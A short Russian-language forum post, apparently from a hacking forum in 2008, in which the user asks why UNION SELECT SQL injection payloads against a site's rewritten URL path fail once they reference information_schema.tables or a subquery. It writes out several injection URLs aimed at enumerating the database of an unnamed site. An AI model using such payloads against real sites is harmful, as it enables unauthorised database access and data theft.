10.08.2008, 23:17
|
|
Познающий
Регистрация: 18.07.2007
Сообщений: 40
С нами:
9903046
Репутация:
13
|
|
sql-injection трабл
Имеется инъекция типа
Код:
http://site/cat/'SQL
где видимо применен mod_rewrite
запрос типа
Код:
http://site/cat/' union select 1,2,3,4
прекрасно выполняется, даже есть поля выводимые на экране, но если попробовать выбрать данные из другой таблицы, например
Код:
http://site/cat/' union select 1,2,3,4 from information_schema.tables
, то возникает ошибка
Причем ошибка появляется и в тестовом случае
Код:
http://site/cat/' union select 1,2,3,4 from (selest 1) as test
хотя версия Mysql - 5.0.51
В чем проблемы? |
|
|